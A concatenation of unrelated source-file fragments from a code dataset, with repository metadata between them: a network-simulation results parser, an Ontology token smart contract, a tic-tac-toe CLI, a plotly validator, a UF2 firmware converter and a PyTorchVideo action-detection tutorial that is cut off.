dict_result_agg = {'PktsDrop':aux_agg[2], "AvgDelay":aux_agg[3], "AvgLnDelay":aux_agg[4], "p10":aux_agg[5], "p20":aux_agg[6], "p50":aux_agg[7], "p80":aux_agg[8], "p90":aux_agg[9], "Jitter":aux_agg[10]}
lst_result_flows = []
aux_result_flows = f[j].split(':')
for flow in aux_result_flows:
dict_result_tmp = {}
tmp_result_flow = flow.split(',')
tmp_result_flow = list(map(float, tmp_result_flow))
q_flows.put([tmp_result_flow[0], tmp_result_flow[1]])
dict_result_tmp = {'PktsDrop':tmp_result_flow[2], "AvgDelay":tmp_result_flow[3], "AvgLnDelay":tmp_result_flow[4], "p10":tmp_result_flow[5], "p20":tmp_result_flow[6], "p50":tmp_result_flow[7], "p80":tmp_result_flow[8], "p90":tmp_result_flow[9], "Jitter":tmp_result_flow[10]}
lst_result_flows.append(dict_result_tmp)
dict_traffic_srcdst = {}
# From kbps to bps
dict_traffic_agg = {'AvgBw':aux_agg[0]*1000,
'PktsGen':aux_agg[1],
'TotalPktsGen':aux_agg[1]*sim_time}
lst_traffic_flows = []
aux_traffic_flows = t[j].split(':')
for flow in aux_traffic_flows:
dict_traffic = {}
q_values_for_flow = q_flows.get()
tmp_traffic_flow = flow.split(',')
tmp_traffic_flow = list(map(float, tmp_traffic_flow))
offset = self._timedistparams(tmp_traffic_flow,dict_traffic)
if offset != -1:
self._sizedistparams(tmp_traffic_flow, offset, dict_traffic)
# From kbps to bps
dict_traffic['AvgBw'] = q_values_for_flow[0]*1000
dict_traffic['PktsGen'] = q_values_for_flow[1]
dict_traffic['TotalPktsGen'] = sim_time * dict_traffic['PktsGen']
dict_traffic['ToS'] = tmp_traffic_flow[-1]
if (len(dict_traffic.keys())!=0):
lst_traffic_flows.append (dict_traffic)
dict_result_srcdst['AggInfo'] = dict_result_agg
dict_result_srcdst['Flows'] = lst_result_flows
dict_traffic_srcdst['AggInfo'] = dict_traffic_agg
dict_traffic_srcdst['Flows'] = lst_traffic_flows
new_result_row.append(dict_result_srcdst)
new_traffic_row.append(dict_traffic_srcdst)
m_result.append(new_result_row)
m_traffic.append(new_traffic_row)
m_result = numpy.asmatrix(m_result)
m_traffic = numpy.asmatrix(m_traffic)
s._set_performance_matrix(m_result)
s._set_traffic_matrix(m_traffic)
def _timedistparams(self, data, dict_traffic):
"""
Parameters
----------
data : List
List of all the flow traffic parameters to be processed.
dict_traffic: dictionary
Dictionary to fill with the time distribution information
extracted from data
Returns
-------
offset : int
Number of elements read from the list of parameters data
"""
# print(data[0])
if data[0] == 0:
dict_traffic['TimeDist'] = TimeDist.EXPONENTIAL_T
params = {}
params['EqLambda'] = data[1]
params['AvgPktsLambda'] = data[2]
params['ExpMaxFactor'] = data[3]
dict_traffic['TimeDistParams'] = params
return 4
elif data[0] == 1:
dict_traffic['TimeDist'] = TimeDist.DETERMINISTIC_T
params = {}
params['EqLambda'] = data[1]
params['AvgPktsLambda'] = data[2]
dict_traffic['TimeDistParams'] = params
return 3
elif data[0] == 2:
dict_traffic['TimeDist'] = TimeDist.UNIFORM_T
params = {}
params['EqLambda'] = data[1]
params['MinPktLambda'] = data[2]
params['MaxPktLambda'] = data[3]
dict_traffic['TimeDistParams'] = params
return 4
elif data[0] == 3:
dict_traffic['TimeDist'] = TimeDist.NORMAL_T
params = {}
params['EqLambda'] = data[1]
params['AvgPktsLambda'] = data[2]
params['StdDev'] = data[3]
dict_traffic['TimeDistParams'] = params
return 4
elif data[0] == 4:
dict_traffic['TimeDist'] = TimeDist.ONOFF_T
params = {}
params['EqLambda'] = data[1]
params['PktsLambdaOn'] = data[2]
params['AvgTOff'] = data[3]
params['AvgTOn'] = data[4]
params['ExpMaxFactor'] = data[5]
dict_traffic['TimeDistParams'] = params
return 6
elif data[0] == 5:
dict_traffic['TimeDist'] = TimeDist.PPBP_T
params = {}
params['EqLambda'] = data[1]
params['BurstGenLambda'] = data[2]
params['Bitrate'] = data[3]
params['ParetoMinSize'] = data[4]
params['ParetoMaxSize'] = data[5]
params['ParetoAlfa'] = data[6]
params['ExpMaxFactor'] = data[7]
dict_traffic['TimeDistParams'] = params
return 8
else: return -1
def _sizedistparams(self, data, starting_point, dict_traffic):
"""
Parameters
----------
data : List
List of all the flow traffic parameters to be processed.
starting_point : int
Point of the overall traffic file line where the extraction of
data regarding the size distribution should start.
dict_traffic : dictionary
Dictionary to fill with the size distribution information
extracted from data
Returns
-------
ret : int
0 if it finish successfully and -1 otherwise
"""
if data[starting_point] == 0:
dict_traffic['SizeDist'] = SizeDist.DETERMINISTIC_S
params = {}
params['AvgPktSize'] = data[starting_point+1]
dict_traffic['SizeDistParams'] = params
elif data[starting_point] == 1:
dict_traffic['SizeDist'] = SizeDist.UNIFORM_S
params = {}
params['AvgPktSize'] = data[starting_point+1]
params['MinSize'] = data[starting_point+2]
params['MaxSize'] = data[starting_point+3]
dict_traffic['SizeDistParams'] = params
elif data[starting_point] == 2:
dict_traffic['SizeDist'] = SizeDist.BINOMIAL_S
params = {}
params['AvgPktSize'] = data[starting_point+1]
params['PktSize1'] = data[starting_point+2]
params['PktSize2'] = data[starting_point+3]
dict_traffic['SizeDistParams'] = params
elif data[starting_point] == 3:
dict_traffic['SizeDist'] = SizeDist.GENERIC_S
params = {}
params['AvgPktSize'] = data[starting_point+1]
params['NumCandidates'] = data[starting_point+2]
for i in range(0, int(data[starting_point+2]) * 2, 2):
params["Size_%d"%(i/2)] = data[starting_point+3+i]
params["Prob_%d"%(i/2)] = data[starting_point+4+i]
dict_traffic['SizeDistParams'] = params
else:
return -1
return 0
def _process_link_usage_line(self, lline,s):
"""
Parameters
----------
lline : str
Last line read in the links usage file.
s : Sample
Instance of Sample associated with the current iteration.
Returns
-------
None.
"""
# link_stat is an array of the nodes containing a dictionary with the adjacent nodes.
# Each adjacent node contains a dictionary with performance metrics
links_stat = []
l = lline.split(";")
netSize = s.get_network_size()
for i in range(netSize):
links_stat.append({})
for j in range(netSize):
if (l[i*netSize*2+j*2] == "-1"):
continue
link_stat = {}
link_stat["utilization"] = float(l[i*netSize*2+j*2])
link_stat["loses"] = float(l[i*netSize*2+j*2+1])
links_stat[i][j] = link_stat
#
s.links_performance = links_stat
| 33.230831
| 293
| 0.539771
|
4a1452950529a775356e462203a19d06863c5532
| 10,117
|
py
|
Python
|
MySimpleToken/MySimpleToken.py
|
lucas7788/python-template
|
fcb8dc5caf85f519d14b8eacb0814532954f3060
|
[
"Apache-2.0"
] | null | null | null |
MySimpleToken/MySimpleToken.py
|
lucas7788/python-template
|
fcb8dc5caf85f519d14b8eacb0814532954f3060
|
[
"Apache-2.0"
] | null | null | null |
MySimpleToken/MySimpleToken.py
|
lucas7788/python-template
|
fcb8dc5caf85f519d14b8eacb0814532954f3060
|
[
"Apache-2.0"
] | 1
|
2020-09-11T02:30:51.000Z
|
2020-09-11T02:30:51.000Z
|
from boa.interop.System.Storage import Put, Get, GetContext
from boa.builtins import concat
from boa.interop.System.Storage import Put, Delete
from boa.interop.System.Runtime import CheckWitness, Notify
from template_contract_test.libs.SafeCheck import Require, RequireScriptHash,RequireWitness
from template_contract_test.libs.Utils import SafePut
from template_contract_test.libs.SafeMath import Sub, Add
TOKEN_NAME = 'My Simple Token'
TOKEN_SYMBOL = 'MST'
################################################################################
# TOKEN INFO CONSTANTS
# DEPLOYER is AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p---616f2a4a38396ff203ea01e6c070ae421bb8ce2d
DEPLOYER = bytearray(b'\x61\x6f\x2a\x4a\x38\x39\x6f\xf2\x03\xea\x01\xe6\xc0\x70\xae\x42\x1b\xb8\xce\x2d')
INIT_SUPPLY = 1000000000
TOKEN_DECIMALS = 8
FACTOR = 100000000
################################################################################
# STORAGE KEY CONSTANT
# Belows are storage key for some variable token information.
OWNER_KEY = '___OWNER'
MST_SUPPLY_KEY = '__SUPPLY'
################################################################################
# STORAGE KEY PREFIX
# Since all data are stored in the key-value storage, the data need to be
# classified by key prefix. All key prefixes length must be the same.
OWN_PREFIX = '_____own'
ALLOWANCE_PREFIX = '___allow'
################################################################################
#
def Main(operation, args):
if operation == 'deploy':
return Deploy()
elif operation == 'name':
return TOKEN_NAME
elif operation == 'decimals':
return TOKEN_DECIMALS
elif operation == 'symbol':
return TOKEN_SYMBOL
elif operation == 'totalSupply':
return TotalSupply()
elif operation == 'balanceOf':
if len(args) == 1:
return BalanceOf(args[0])
elif operation == 'transfer':
if len(args) == 3:
return Transfer(args[0], args[1], args[2])
elif operation == 'transferFrom':
if len(args) == 4:
return TransferFrom(args[0], args[1], args[2], args[3])
elif operation == 'approve':
if len(args) == 3:
return Approve(args[0], args[1], args[2])
elif operation == 'allowance':
if len(args) == 2:
return Allowance(args[0], args[1])
elif operation == 'mint':
if len(args) == 2:
return Mint(args[0], args[1])
elif operation == 'burn':
if len(args) == 1:
return Burn(args[0])
elif operation == 'transferOwnership':
if len(args) == 1:
return TransferOwnership(args[0])
return False
def Deploy():
"""
Constructor of this contract. Only deployer hard-coded can call this function
and cannot call this function after called once.
Followings are initialization list for this token
1. Transfer the owner to the deployer. (Owner can mint and burn the token)
2. Supply initial coin to the deployer.
"""
ctx = GetContext()
Require(CheckWitness(DEPLOYER)) # only can be initialized by deployer
Require(not Get(ctx, 'DEPLOYED')) # only can deploy once
# disable to deploy again
Put(ctx, 'DEPLOYED', 1)
# the first owner is the deployer
# can transfer ownership to other by calling `transferOwner` function
Put(ctx, OWNER_KEY, DEPLOYER)
# supply the coin. All coin will belong to deployer.
Put(ctx, MST_SUPPLY_KEY, INIT_SUPPLY * FACTOR)
Put(ctx, concat(OWN_PREFIX, DEPLOYER), INIT_SUPPLY * FACTOR)
return True
def TotalSupply():
"""
Gets the total supply for MST token. The total supply can be changed by
owner's invoking function calls for minting and burning.
"""
return _totalSupply(GetContext())
def BalanceOf(account):
"""
Gets the MST token balance of an account.
:param account: account
"""
return _balanceOf(GetContext(), account)
def Transfer(_from, _to, _value):
"""
Sends the amount of tokens from address `from` to address `to`. The parameter
`from` must be the invoker.
:param _from: invoker address.
:param _to: receiver address.
:param _value: MST amount.
"""
RequireWitness(_from) # from address validation
return _transfer(GetContext(), _from, _to, _value)
def TransferFrom(_originator, _from, _to, _amount):
"""
Transfers the amount of tokens in `from` address to `to` address by invoker.
Only approved amount can be sent.
:param _originator: invoker address.
:param _from: address for withdrawing.
:param _to: address to receive.
:param _amount: MST amount.
"""
return _transferFrom(GetContext(), _originator, _from, _to, _amount)
def Approve(_from, _to, _amount):
"""
Approves `to` address to withdraw MST token from the invoker's address. It
overwrites the previous approval value.
:param _from: invoker address.
:param _to: address to approve.
:param _amount: MST amount to approve.
"""
RequireWitness(_from) # only the token owner can approve
return _approve(GetContext(), _from, _to, _amount)
def Burn(_amount):
"""
Burns the amount of MST token from the owner's address.
:param _amount: MST amount to burn.
"""
ctx = GetContext()
_onlyOwner(ctx) # only owner can burn the token
return _burn(ctx, Get(ctx, OWNER_KEY), _amount)
def Mint(_to, _amount):
"""
Mints the amount of MST token.
:param _to: address to receive token.
:param _amount: the amount to mint.
"""
ctx = GetContext()
_onlyOwner(ctx) # only owner can mint token
return _mint(ctx, _to, _amount)
def TransferOwnership(_account):
"""
Transfers the ownership of this contract to other.
:param _account: address to transfer ownership.
"""
ctx = GetContext()
_onlyOwner(ctx)
return _transferOwnership(ctx, _account)
def Allowance(_from, _to):
"""
Gets the amount of allowance from address `from` to address `to`.
:param _from: from address
:param _to: to address
:return: the amount of allowance.
"""
return _allowance(GetContext(), _from, _to)
################################################################################
# INTERNAL FUNCTIONS
# Internal functions checks parameter and storage result validation but these
# wouldn't check the witness validation, so caller function must check the
# witness if necessary.
def _transfer(_context, _from, _to, _value):
Require(_value > 0) # transfer value must be over 0
RequireScriptHash(_to) # to-address validation
from_val = _balanceOf(_context, _from)
to_val = _balanceOf(_context, _to)
from_val = Sub(from_val, _value)
to_val = Add(to_val, _value)
SafePut(_context, concat(OWN_PREFIX, _from), from_val)
SafePut(_context, concat(OWN_PREFIX, _to), to_val)
Notify(["transfer", from_val, to_val, _value])
return True
def _balanceOf(_context, _account):
return Get(_context, concat(OWN_PREFIX, _account))
def _transferFrom(_context, _owner, _spender, _to, _amount):
RequireWitness(_owner)
RequireScriptHash(_spender)
RequireScriptHash(_to)
Require(_amount > 0)
approve_key = concat(ALLOWANCE_PREFIX, concat(_spender, _owner))
approve_amount = Get(_context, approve_key)
approve_amount = Sub(approve_amount, _amount)
if not _transfer(_context, _spender, _to, _amount):
return False
SafePut(_context, approve_key, approve_amount)
Notify(["transferFrom", _owner, _spender, _to, _amount])
return True
def _approve(_context, _from, _to, _amount):
RequireScriptHash(_to) # to-address validation
Require(_amount >= 0) # amount must be not minus value
from_val = _balanceOf(_context, _from)
approved_val = _allowance(_context, _from, _to)
approve_val = Add(approved_val, _amount)
Require(from_val >= approve_val) # the token owner must have the amount over approved
approve_key = concat(ALLOWANCE_PREFIX, concat(_from, _to))
SafePut(_context, approve_key, approve_val)
return True
def _burn(_context, _account, _amount):
Require(_amount > 0) # the amount to burn should be over 0
account_val = _balanceOf(_context, _account)
total_supply = _totalSupply(_context)
Require(_amount < total_supply) # should be not over total supply
# burn the token from account. It also subtract the total supply
account_val = Sub(account_val, _amount)
total_supply = Sub(total_supply, _amount)
SafePut(_context, concat(OWN_PREFIX, _account), account_val)
SafePut(_context, MST_SUPPLY_KEY, total_supply)
Notify(["burn", _account, _amount])
return True
def _mint(_context, _to, _amount):
Require(_amount > 0) # mint value must be over 0
RequireScriptHash(_to) # to address should
total_supply = _totalSupply(_context)
to_val = _balanceOf(_context, _to)
# Add total supply value and give the token to the to-address
total_supply += _amount
to_val += _amount
SafePut(_context, MST_SUPPLY_KEY, total_supply)
SafePut(_context, concat(OWN_PREFIX, _to), to_val)
Notify(["mint", _to, _amount])
return True
def _transferOwnership(_context, _account):
RequireScriptHash(_account)
Put(_context, OWNER_KEY, _account)
Notify(["transferOwnership", _account])
return True
################################################################################
# modifiers
def _onlyOwner(_context):
"""
Checks the invoker is the contract owner or not. Owner key is saved in the
storage key `___OWNER`, so check its value and invoker.
"""
RequireWitness(Get(_context, OWNER_KEY))
################################################################################
def _totalSupply(_context):
return Get(_context, MST_SUPPLY_KEY)
def _allowance(_context, _from, _to):
return Get(_context, concat(ALLOWANCE_PREFIX, concat(_from, _to)))
| 30.2
| 105
| 0.643175
|
4a14529b15d355c945f368baa671d611d064ec7a
| 1,534
|
py
|
Python
|
tictactoe/cli.py
|
luisds95/tictactoe-python
|
9765556372e303943bea82b85264e3fdca25a254
|
[
"MIT"
] | null | null | null |
tictactoe/cli.py
|
luisds95/tictactoe-python
|
9765556372e303943bea82b85264e3fdca25a254
|
[
"MIT"
] | null | null | null |
tictactoe/cli.py
|
luisds95/tictactoe-python
|
9765556372e303943bea82b85264e3fdca25a254
|
[
"MIT"
] | null | null | null |
import logging
import click
from tictactoe.agent import AgentIsNotTrainableError, TrainableAgent
from tictactoe.environment import DICT_DATABASE_FILE
from tictactoe.game.play import Game
from tictactoe.log.logger import TrainingLogger
@click.group()
def main():
pass
@main.command()
@click.argument("P1", default="human")
@click.argument("P2", default="random")
@click.option("--n-games", default=1, help="Number of games to play", type=int)
@click.option("--loud/--quiet", default=None, help="Level of verbosity")
@click.option("--train/--no-train", help="Should train non-human players")
@click.option("--database", default=str(DICT_DATABASE_FILE), type=str)
def play(
p1: str, p2: str, n_games: int, loud: bool, train: bool, database: str
) -> None:
"""
Play a tic tac toe game. Possible players: human, random, searcher
"""
frequency = 1 if loud else 1000
logger = TrainingLogger(frequency=frequency, handler=click.echo)
if loud or "human" in (p1, p2):
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
game = Game(p1, p2, database_str=database, logger=logger)
if train:
p1_agent, _ = game.agents
if isinstance(p1_agent, TrainableAgent):
logger.log("Starting training", force=True)
p1_agent.train()
else:
raise AgentIsNotTrainableError
else:
game.play(n=n_games)
@main.command()
def start_api():
from tictactoe.app import app
app.run()
| 28.407407
| 79
| 0.683181
|
4a145301dd2fc48a358bd05e8cd75009a62affa5
| 111
|
py
|
Python
|
maximum_sum_bst_in_binary_tree.py
|
pranavdave893/Leetcode
|
1f30ea37af7b60585d168b15d9397143f53c92a1
|
[
"MIT"
] | null | null | null |
maximum_sum_bst_in_binary_tree.py
|
pranavdave893/Leetcode
|
1f30ea37af7b60585d168b15d9397143f53c92a1
|
[
"MIT"
] | null | null | null |
maximum_sum_bst_in_binary_tree.py
|
pranavdave893/Leetcode
|
1f30ea37af7b60585d168b15d9397143f53c92a1
|
[
"MIT"
] | null | null | null |
https://leetcode.com/problems/maximum-sum-bst-in-binary-tree/discuss/571513/python-recursion-easy-to-understand
| 111
| 111
| 0.837838
|
4a145373ffcfe977adb104051521a6390919b264
| 622
|
py
|
Python
|
env/lib/python3.8/site-packages/plotly/validators/scatter3d/marker/colorbar/_tickformatstopdefaults.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11,750
|
2015-10-12T07:03:39.000Z
|
2022-03-31T20:43:15.000Z
|
env/lib/python3.8/site-packages/plotly/validators/scatter3d/marker/colorbar/_tickformatstopdefaults.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 2,951
|
2015-10-12T00:41:25.000Z
|
2022-03-31T22:19:26.000Z
|
env/lib/python3.8/site-packages/plotly/validators/scatter3d/marker/colorbar/_tickformatstopdefaults.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 2,623
|
2015-10-15T14:40:27.000Z
|
2022-03-28T16:05:50.000Z
|
import _plotly_utils.basevalidators
class TickformatstopdefaultsValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(
self,
plotly_name="tickformatstopdefaults",
parent_name="scatter3d.marker.colorbar",
**kwargs
):
super(TickformatstopdefaultsValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Tickformatstop"),
data_docs=kwargs.pop(
"data_docs",
"""
""",
),
**kwargs
)
| 28.272727
| 86
| 0.606109
|
4a1455e0416c7a9dbab669876d871312c24fae81
| 9,260
|
py
|
Python
|
boards/milador-nrf52-0.1.0/tools/uf2conv/uf2conv.py
|
milador/milador-arduino
|
d0f9ebe33e0e67a921f96d0e278d9d646b8bad91
|
[
"MIT"
] | 54
|
2020-09-04T12:02:30.000Z
|
2022-03-27T21:17:02.000Z
|
packages/framework-arduinoadafruitnrf52/tools/uf2conv/uf2conv.py
|
jeffc/nrf52-watch
|
f59b5f3295a3b42abadb2083eed439bf24fdff7d
|
[
"MIT"
] | 16
|
2020-09-04T14:36:14.000Z
|
2022-01-13T03:29:27.000Z
|
packages/framework-arduinoadafruitnrf52/tools/uf2conv/uf2conv.py
|
jeffc/nrf52-watch
|
f59b5f3295a3b42abadb2083eed439bf24fdff7d
|
[
"MIT"
] | 10
|
2020-09-04T22:54:57.000Z
|
2021-12-10T14:20:31.000Z
|
#!/usr/bin/env python3
import sys
import struct
import subprocess
import re
import os
import os.path
import argparse
UF2_MAGIC_START0 = 0x0A324655 # "UF2\n"
UF2_MAGIC_START1 = 0x9E5D5157 # Randomly selected
UF2_MAGIC_END = 0x0AB16F30 # Ditto
families = {
'SAMD21': 0x68ed2b88,
'SAMD51': 0x55114460,
'NRF52': 0x1b57745f,
'STM32F1': 0x5ee21072,
'STM32F4': 0x57755a57,
'ATMEGA32': 0x16573617,
}
INFO_FILE = "/INFO_UF2.TXT"
appstartaddr = 0x2000
familyid = 0x0
def is_uf2(buf):
w = struct.unpack("<II", buf[0:8])
return w[0] == UF2_MAGIC_START0 and w[1] == UF2_MAGIC_START1
def is_hex(buf):
try:
w = buf[0:30].decode("utf-8")
except UnicodeDecodeError:
return False
if w[0] == ':' and re.match(b"^[:0-9a-fA-F\r\n]+$", buf):
return True
return False
def convert_from_uf2(buf):
global appstartaddr
numblocks = len(buf) // 512
curraddr = None
outp = b""
for blockno in range(numblocks):
ptr = blockno * 512
block = buf[ptr:ptr + 512]
hd = struct.unpack(b"<IIIIIIII", block[0:32])
if hd[0] != UF2_MAGIC_START0 or hd[1] != UF2_MAGIC_START1:
print("Skipping block at " + ptr + "; bad magic")
continue
if hd[2] & 1:
# NO-flash flag set; skip block
continue
datalen = hd[4]
if datalen > 476:
assert False, "Invalid UF2 data size at " + ptr
newaddr = hd[3]
if curraddr == None:
appstartaddr = newaddr
curraddr = newaddr
padding = newaddr - curraddr
if padding < 0:
assert False, "Block out of order at " + ptr
if padding > 10*1024*1024:
assert False, "More than 10M of padding needed at " + ptr
if padding % 4 != 0:
assert False, "Non-word padding size at " + ptr
while padding > 0:
padding -= 4
outp += b"\x00\x00\x00\x00"
outp += block[32 : 32 + datalen]
curraddr = newaddr + datalen
return outp
def convert_to_carray(file_content):
outp = "const unsigned char bindata[] __attribute__((aligned(16))) = {"
for i in range(len(file_content)):
if i % 16 == 0:
outp += "\n"
outp += "0x%02x, " % ord(file_content[i])
outp += "\n};\n"
return outp
def convert_to_uf2(file_content):
global familyid
datapadding = b""
while len(datapadding) < 512 - 256 - 32 - 4:
datapadding += b"\x00\x00\x00\x00"
numblocks = (len(file_content) + 255) // 256
outp = b""
for blockno in range(numblocks):
ptr = 256 * blockno
chunk = file_content[ptr:ptr + 256]
flags = 0x0
if familyid:
flags |= 0x2000
hd = struct.pack(b"<IIIIIIII",
UF2_MAGIC_START0, UF2_MAGIC_START1,
flags, ptr + appstartaddr, 256, blockno, numblocks, familyid)
while len(chunk) < 256:
chunk += b"\x00"
block = hd + chunk + datapadding + struct.pack(b"<I", UF2_MAGIC_END)
assert len(block) == 512
outp += block
return outp
class Block:
def __init__(self, addr):
self.addr = addr
self.bytes = bytearray(256)
def encode(self, blockno, numblocks):
global familyid
flags = 0x0
if familyid:
flags |= 0x2000
hd = struct.pack("<IIIIIIII",
UF2_MAGIC_START0, UF2_MAGIC_START1,
flags, self.addr, 256, blockno, numblocks, familyid)
hd += self.bytes[0:256]
while len(hd) < 512 - 4:
hd += b"\x00"
hd += struct.pack("<I", UF2_MAGIC_END)
return hd
def convert_from_hex_to_uf2(buf):
global appstartaddr
appstartaddr = None
upper = 0
currblock = None
blocks = []
for line in buf.split('\n'):
if line[0] != ":":
continue
i = 1
rec = []
while i < len(line) - 1:
rec.append(int(line[i:i+2], 16))
i += 2
tp = rec[3]
if tp == 4:
upper = ((rec[4] << 8) | rec[5]) << 16
elif tp == 2:
upper = ((rec[4] << 8) | rec[5]) << 4
assert (upper & 0xffff) == 0
elif tp == 1:
break
elif tp == 0:
addr = upper | (rec[1] << 8) | rec[2]
if appstartaddr == None:
appstartaddr = addr
i = 4
while i < len(rec) - 1:
if not currblock or currblock.addr & ~0xff != addr & ~0xff:
currblock = Block(addr & ~0xff)
blocks.append(currblock)
currblock.bytes[addr & 0xff] = rec[i]
addr += 1
i += 1
numblocks = len(blocks)
resfile = b""
for i in range(0, numblocks):
resfile += blocks[i].encode(i, numblocks)
return resfile
def get_drives():
drives = []
if sys.platform == "win32":
r = subprocess.check_output(["wmic", "PATH", "Win32_LogicalDisk",
"get", "DeviceID,", "VolumeName,",
"FileSystem,", "DriveType"])
for line in r.split('\n'):
words = re.split('\s+', line)
if len(words) >= 3 and words[1] == "2" and words[2] == "FAT":
drives.append(words[0])
else:
rootpath = "/media"
if sys.platform == "darwin":
rootpath = "/Volumes"
elif sys.platform == "linux":
tmp = rootpath + "/" + os.environ["USER"]
if os.path.isdir(tmp):
rootpath = tmp
for d in os.listdir(rootpath):
drives.append(os.path.join(rootpath, d))
def has_info(d):
try:
return os.path.isfile(d + INFO_FILE)
except:
return False
return list(filter(has_info, drives))
def board_id(path):
with open(path + INFO_FILE, mode='r') as file:
file_content = file.read()
return re.search("Board-ID: ([^\r\n]*)", file_content).group(1)
def list_drives():
for d in get_drives():
print(d, board_id(d))
def write_file(name, buf):
with open(name, "wb") as f:
f.write(buf)
print("Wrote %d bytes to %s." % (len(buf), name))
def main():
global appstartaddr, familyid
def error(msg):
print(msg)
sys.exit(1)
parser = argparse.ArgumentParser(description='Convert to UF2 or flash directly.')
parser.add_argument('input', metavar='INPUT', type=str, nargs='?',
help='input file (HEX, BIN or UF2)')
parser.add_argument('-b' , '--base', dest='base', type=str,
default="0x2000",
help='set base address of application for BIN format (default: 0x2000)')
parser.add_argument('-o' , '--output', metavar="FILE", dest='output', type=str,
help='write output to named file; defaults to "flash.uf2" or "flash.bin" where sensible')
parser.add_argument('-d' , '--device', dest="device_path",
help='select a device path to flash')
parser.add_argument('-l' , '--list', action='store_true',
help='list connected devices')
parser.add_argument('-c' , '--convert', action='store_true',
help='do not flash, just convert')
parser.add_argument('-f' , '--family', dest='family', type=str,
default="0x0",
help='specify familyID - number or name (default: 0x0)')
parser.add_argument('-C' , '--carray', action='store_true',
help='convert binary file to a C array, not UF2')
args = parser.parse_args()
appstartaddr = int(args.base, 0)
if args.family.upper() in families:
familyid = families[args.family.upper()]
else:
try:
familyid = int(args.family, 0)
except ValueError:
error("Family ID needs to be a number or one of: " + ", ".join(families.keys()))
if args.list:
list_drives()
else:
if not args.input:
error("Need input file")
with open(args.input, mode='rb') as f:
inpbuf = f.read()
from_uf2 = is_uf2(inpbuf)
ext = "uf2"
if from_uf2:
outbuf = convert_from_uf2(inpbuf)
ext = "bin"
elif is_hex(inpbuf):
outbuf = convert_from_hex_to_uf2(inpbuf.decode("utf-8"))
elif args.carray:
outbuf = convert_to_carray(inpbuf)
ext = "h"
else:
outbuf = convert_to_uf2(inpbuf)
print("Converting to %s, output size: %d, start address: 0x%x" %
(ext, len(outbuf), appstartaddr))
if args.convert:
drives = []
if args.output == None:
args.output = "flash." + ext
else:
drives = get_drives()
if args.output:
write_file(args.output, outbuf)
else:
if len(drives) == 0:
error("No drive to deploy.")
for d in drives:
print("Flashing %s (%s)" % (d, board_id(d)))
write_file(d + "/NEW.UF2", outbuf)
if __name__ == "__main__":
main()
| 31.712329
| 113
| 0.530346
|
4a14565a593c6d0227b61ff7c70a4680a8afde37
| 9,471
|
py
|
Python
|
tutorials/video_detection_example/video_detection_inference_tutorial.py
|
Spencer551/pytorchvideo
|
9ee08f3112b5ad007a431cccc26598a1f28cf5b4
|
[
"Apache-2.0"
] | null | null | null |
tutorials/video_detection_example/video_detection_inference_tutorial.py
|
Spencer551/pytorchvideo
|
9ee08f3112b5ad007a431cccc26598a1f28cf5b4
|
[
"Apache-2.0"
] | null | null | null |
tutorials/video_detection_example/video_detection_inference_tutorial.py
|
Spencer551/pytorchvideo
|
9ee08f3112b5ad007a431cccc26598a1f28cf5b4
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# # Torch Hub Detection Inference Tutorial
#
# In this tutorial you'll learn:
# - how to load a pretrained detection model using Torch Hub
# - run inference to detect actions in a demo video
# ## NOTE:
# At the moment tutorial only works if ran on local clone from the directory `pytorchvideo/tutorials/video_detection_example`
# ### Install and Import modules
# If `torch`, `torchvision`, `cv2` and `pytorchvideo` are not installed, run the following cell:
# In[1]:
import os
import sys
import torch
import cv2
import pytorchvideo
from functools import partial
import numpy as np
import detectron2
from detectron2.config import get_cfg
from detectron2 import model_zoo
from detectron2.engine import DefaultPredictor
import pytorchvideo
from pytorchvideo.transforms.functional import (
uniform_temporal_subsample,
short_side_scale_with_boxes,
clip_boxes_to_image,
)
from torchvision.transforms._functional_video import normalize
from pytorchvideo.data.ava import AvaLabeledVideoFramePaths
from pytorchvideo.models.hub import slow_r50_detection # Another option is slowfast_r50_detection
from visualization import VideoVisualizer
# ## Load Model using Torch Hub API
# PyTorchVideo provides several pretrained models through Torch Hub. Available models are described in [model zoo documentation.](https://github.com/facebookresearch/pytorchvideo/blob/main/docs/source/model_zoo.md)
#
# Here we are selecting the slow_r50_detection model which was trained using a 4x16 setting on the Kinetics 400 dataset and
# fine tuned on AVA V2.2 actions dataset.
#
# NOTE: to run on GPU in Google Colab, in the menu bar selet: Runtime -> Change runtime type -> Harware Accelerator -> GPU
# In[3]:
device = 'cuda' # or 'cpu'
video_model = slow_r50_detection(True) # Another option is slowfast_r50_detection
video_model = video_model.eval().to(device)
# ## Load an off-the-shelf Detectron2 object detector
#
# We use the object detector to detect bounding boxes for the people.
# These bounding boxes later feed into our video action detection model.
# For more details, please refer to the Detectron2's object detection tutorials.
#
# To install Detectron2, please follow the instructions mentioned [here](https://github.com/facebookresearch/detectron2/blob/main/INSTALL.md)
# In[4]:
cfg = get_cfg()
cfg.merge_from_file(model_zoo.get_config_file("COCO-Detection/faster_rcnn_R_50_FPN_3x.yaml"))
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.55 # set threshold for this model
cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url("COCO-Detection/faster_rcnn_R_50_FPN_3x.yaml")
predictor = DefaultPredictor(cfg)
# This method takes in an image and generates the bounding boxes for people in the image.
def get_person_bboxes(inp_img, predictor):
predictions = predictor(inp_img.cpu().detach().numpy())['instances'].to('cpu')
boxes = predictions.pred_boxes if predictions.has("pred_boxes") else None
scores = predictions.scores if predictions.has("scores") else None
classes = np.array(predictions.pred_classes.tolist() if predictions.has("pred_classes") else None)
predicted_boxes = boxes[np.logical_and(classes==0, scores>0.75 )].tensor.cpu() # only person
return predicted_boxes
# ## Define the transformations for the input required by the model
# Before passing the video and bounding boxes into the model we need to apply some input transforms and sample a clip of the correct frame rate in the clip.
#
